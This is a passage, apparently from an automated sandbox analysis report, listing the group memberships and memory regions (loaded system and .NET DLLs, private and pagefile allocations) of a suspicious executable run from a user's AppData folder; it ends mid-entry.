os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f343" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2662
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2663
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2664
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2665
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 2666
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 2667
start_va = 0x70000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 2668
start_va = 0x210000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 2669
start_va = 0xec0000
end_va = 0xf89fff
monitored = 1
entry_point = 0xf84c4e
region_type = mapped_file
name = "nfxioujoilco.exe"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe")
Region:
id = 2670
start_va = 0x772b0000
end_va = 0x77458fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2671
start_va = 0x77490000
end_va = 0x7760ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 2672
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 2673
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 2674
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 2675
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 2676
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2677
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2678
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 2679
start_va = 0x250000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2680
start_va = 0x73c20000
end_va = 0x73c5efff
monitored = 0
entry_point = 0x73c4e088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 2681
start_va = 0x73bc0000
end_va = 0x73c1bfff
monitored = 0
entry_point = 0x73bff9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 2682
start_va = 0x73bb0000
end_va = 0x73bb7fff
monitored = 0
entry_point = 0x73bb20f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 2683
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2684
start_va = 0x76b80000
end_va = 0x76c8ffff
monitored = 0
entry_point = 0x76b93283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2685
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2686
start_va = 0x77190000
end_va = 0x772aefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000077190000"
filename = ""
Region:
id = 2687
start_va = 0x77090000
end_va = 0x77189fff
monitored = 0
entry_point = 0x770aa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2688
start_va = 0x77090000
end_va = 0x77189fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000077090000"
filename = ""
Region:
id = 2689
start_va = 0x4c0000
end_va = 0x7affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 2690
start_va = 0x73a90000
end_va = 0x73ad9fff
monitored = 1
entry_point = 0x73a92e54
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 2691
start_va = 0x76b80000
end_va = 0x76c8ffff
monitored = 0
entry_point = 0x76b93283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2692
start_va = 0x75160000
end_va = 0x751a6fff
monitored = 0
entry_point = 0x751674c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 2693
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2694
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2695
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2696
start_va = 0x170000
end_va = 0x1d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2697
start_va = 0x250000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2698
start_va = 0x440000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 2699
start_va = 0x250000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2700
start_va = 0x370000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 2705
start_va = 0x76a50000
end_va = 0x76aeffff
monitored = 0
entry_point = 0x76a649e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 2706
start_va = 0x75670000
end_va = 0x7571bfff
monitored = 0
entry_point = 0x7567a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 2707
start_va = 0x75500000
end_va = 0x75518fff
monitored = 0
entry_point = 0x75504975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 2708
start_va = 0x75310000
end_va = 0x753fffff
monitored = 0
entry_point = 0x75320569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 2709
start_va = 0x74fe0000
end_va = 0x7503ffff
monitored = 0
entry_point = 0x74ffa3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 2710
start_va = 0x74fd0000
end_va = 0x74fdbfff
monitored = 0
entry_point = 0x74fd10e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 2711
start_va = 0x4c0000
end_va = 0x59ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 2712
start_va = 0x6b0000
end_va = 0x7affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 2719
start_va = 0x73930000
end_va = 0x739bcfff
monitored = 1
entry_point = 0x73942860
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 2854
start_va = 0x73a80000
end_va = 0x73a82fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 2889
start_va = 0x751e0000
end_va = 0x75236fff
monitored = 0
entry_point = 0x751f9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 2890
start_va = 0x76af0000
end_va = 0x76b7ffff
monitored = 0
entry_point = 0x76b06343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 2891
start_va = 0x76c90000
end_va = 0x76d8ffff
monitored = 0
entry_point = 0x76cab6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 2892
start_va = 0x77460000
end_va = 0x77469fff
monitored = 0
entry_point = 0x774636a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 2893
start_va = 0x75270000
end_va = 0x7530cfff
monitored = 0
entry_point = 0x752a3fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 2894
start_va = 0x7b0000
end_va = 0x937fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 2895
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2896
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2897
start_va = 0x769a0000
end_va = 0x769fffff
monitored = 0
entry_point = 0x769b158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2898
start_va = 0x75040000
end_va = 0x7510bfff
monitored = 0
entry_point = 0x7504168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 2899
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2900
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2901
start_va = 0x940000
end_va = 0xac0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000940000"
filename = ""
Region:
id = 2902
start_va = 0xf90000
end_va = 0x238ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f90000"
filename = ""
Region:
id = 2942
start_va = 0x4c0000
end_va = 0x583fff
monitored = 1
entry_point = 0x584c4e
region_type = mapped_file
name = "nfxioujoilco.exe"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe")
Region:
id = 2943
start_va = 0x590000
end_va = 0x59ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2966
start_va = 0x4c0000
end_va = 0x583fff
monitored = 1
entry_point = 0x584c4e
region_type = mapped_file
name = "nfxioujoilco.exe"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe")
Region:
id = 2967
start_va = 0x74fb0000
end_va = 0x74fb8fff
monitored = 0
entry_point = 0x74fb1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 2968
start_va = 0x74800000
end_va = 0x74faefff
monitored = 1
entry_point = 0x7481d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 2969
start_va = 0x74800000
end_va = 0x74faefff
monitored = 1
entry_point = 0x7481d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 3109
start_va = 0x74800000
end_va = 0x74faefff
monitored = 1
entry_point = 0x7481d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 3131
start_va = 0x73b90000
end_va = 0x73ba3fff
monitored = 0
entry_point = 0x73b9ac00
region_type = mapped_file
name = "vcruntime140_clr0400.dll"
filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll")
Region:
id = 3134
start_va = 0x73ae0000
end_va = 0x73b8afff
monitored = 0
entry_point = 0x73b75f20
region_type = mapped_file
name = "ucrtbase_clr0400.dll"
filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll")
Region:
id = 3193
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 3194
start_va = 0x1f0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 3195
start_va = 0x200000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 3196
start_va = 0x250000
end_va = 0x25ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 3197
start_va = 0x270000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 3198
start_va = 0x260000
end_va = 0x26ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 3199
start_va = 0x2b0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 3200
start_va = 0x2c0000
end_va = 0x2cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 3201
start_va = 0x2d0000
end_va = 0x2d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 3202
start_va = 0x2e0000
end_va = 0x2e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002e0000"
filename = ""
Region:
id = 3203
start_va = 0xad0000
end_va = 0xc9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ad0000"
filename = ""
Region:
id = 3204
start_va = 0xad0000
end_va = 0xc5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ad0000"
filename = ""
Region:
id = 3205
start_va = 0xc60000
end_va = 0xc9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c60000"
filename = ""
Region:
id = 3206
start_va = 0x330000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 3207
start_va = 0xd60000
end_va = 0xe5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d60000"
filename = ""
Region:
id = 3208
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 3209
start_va = 0x2f0000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 3210
start_va = 0x2390000
end_va = 0x438ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 3211
start_va = 0x380000
end_va = 0x41ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 3212
start_va = 0x4f0000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 3213
start_va = 0xb10000
end_va = 0xc0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 3214
start_va = 0xc20000
end_va = 0xc5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c20000"
filename = ""
Region:
id = 3215
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 3216
start_va = 0xcb0000
end_va = 0xceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cb0000"
filename = ""
Region:
id = 3217
start_va = 0x4530000
end_va = 0x462ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004530000"
filename = ""
Region:
id = 3218
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 3219
start_va = 0x4630000
end_va = 0x48fefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3220
start_va = 0x72520000
end_va = 0x7392afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll")
Region:
id = 3221
start_va = 0x75850000
end_va = 0x759abfff
monitored = 0
entry_point = 0x7589ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 3222
start_va = 0x74610000
end_va = 0x7468ffff
monitored = 0
entry_point = 0x746237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 3223
start_va = 0x4900000
end_va = 0x4aeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 3224
start_va = 0x5a0000
end_va = 0x67efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005a0000"
filename = ""
Region:
id = 3225
start_va = 0x2f0000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 3226
start_va = 0x74600000
end_va = 0x74602fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-xstate-l2-1-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll")
Region:
id = 3227
start_va = 0x74570000
end_va = 0x745f8fff
monitored = 1
entry_point = 0x74571130
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 3228
start_va = 0x759b0000
end_va = 0x75a3efff
monitored = 0
entry_point = 0x759b3fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 3229
start_va = 0x300000
end_va = 0x30ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 3230
start_va = 0x71ac0000
end_va = 0x72514fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll")
Region:
id = 3231
start_va = 0x743c0000
end_va = 0x74562fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.drawing.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll")
Region:
id = 3232
start_va = 0x70c50000
end_va = 0x71ab5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.windows.forms.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll")
Region:
id = 3233
start_va = 0x6d2b0000
end_va = 0x6d853fff
monitored = 1
entry_point = 0x6d83b692
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 3234
start_va = 0x310000
end_va = 0x311fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000310000"
filename = ""
Region:
id = 3235
start_va = 0x70430000
end_va = 0x70c47fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll")
Region:
id = 3236
start_va = 0x742b0000
end_va = 0x743b4fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.configuration.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll")
Region:
id = 3237
start_va = 0x320000
end_va = 0x32ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 3238
start_va = 0x6fcb0000
end_va = 0x70423fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll")
Region:
id = 3239
start_va = 0x74290000
end_va = 0x742a2fff
monitored = 1
entry_point = 0x7429d900
region_type = mapped_file
name = "nlssorting.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll")
Region:
id = 3240
start_va = 0x4af0000
end_va = 0x4dc1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nlp"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp")
Region:
id = 3241
start_va = 0x75c40000
end_va = 0x76889fff
monitored = 0
entry_point = 0x75cc1601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 3242
start_va = 0x420000
end_va = 0x420fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000420000"
filename = ""
Region:
id = 3243
start_va = 0x74280000
end_va = 0x7428afff
monitored = 0
entry_point = 0x74281992
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 3244
start_va = 0x4390000
end_va = 0x445ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004390000"
filename = ""
Region:
id = 3245
start_va = 0x74260000
end_va = 0x74276fff
monitored = 0
entry_point = 0x742635fa
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 3246
start_va = 0x74240000
end_va = 0x74256fff
monitored = 0
entry_point = 0x74243573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 3247
start_va = 0x530000
end_va = 0x56bfff
monitored = 0
entry_point = 0x53128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3248
start_va = 0x530000
end_va = 0x56bfff
monitored = 0
entry_point = 0x53128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3249
start_va = 0x530000
end_va = 0x56bfff
monitored = 0
